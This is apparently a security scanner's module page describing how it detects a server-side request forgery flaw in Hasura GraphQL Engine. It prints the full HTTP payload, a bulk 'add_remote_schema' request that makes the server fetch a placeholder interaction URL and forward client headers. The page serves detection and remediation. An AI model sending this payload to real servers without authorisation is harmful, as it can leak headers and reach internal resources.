Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Hasura GraphQL Engine - SSRF Side Request Forgery

By kannthu

High
Vidoc logoVidoc Module
#hasura#ssrf#graphql
Description

Module: Hasura GraphQL Engine - SSRF Side Request Forgery

This module, named "Hasura GraphQL Engine - SSRF Side Request Forgery", is designed to detect a vulnerability in the Hasura GraphQL Engine software. The severity level of this vulnerability is high.

What is the "Hasura GraphQL Engine - SSRF Side Request Forgery?"

The "Hasura GraphQL Engine - SSRF Side Request Forgery" module is a test case designed to detect a specific vulnerability in the Hasura GraphQL Engine software. This vulnerability is categorized as high severity, indicating its potential impact on the security of the system.

Impact

This vulnerability, if exploited, can lead to Server-Side Request Forgery (SSRF) attacks. SSRF allows an attacker to make requests to internal or external resources on behalf of the vulnerable server, potentially leading to unauthorized access, data leakage, or further exploitation of the system.

How the module works?

The module works by sending a specific HTTP request to the target system and analyzing the response. It checks for two matching conditions:

    - The response status code must be 400. - The interaction protocol used in the response must be "http".

If both conditions are met, the module identifies the presence of the vulnerability.

Here is an example of the HTTP request used by the module:

POST /v1/query HTTP/1.1
Host: <Hostname>
Content-Type: application/json
Accept: */*

{
   "type":"bulk",
   "args":[
      {
         "type":"add_remote_schema",
         "args":{
            "name":"test",
            "definition":{
               "url":"https://<InteractionURL>",
               "headers":[
               ],
               "timeout_seconds":60,
               "forward_client_headers":true
            }
         }
      }
   ]
}

The module sends this request to the target system, replacing the placeholders "<Hostname>" and "<InteractionURL>" with the actual values. It then analyzes the response to determine if the vulnerability is present.

If the vulnerability is detected, it is recommended to take immediate action to address the SSRF vulnerability in the Hasura GraphQL Engine software. This may involve applying patches or updates provided by the software vendor, implementing secure configuration settings, or following other recommended security practices.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
status: 400and
word: http
Passive global matcher
No matching conditions.
On match action
Report vulnerability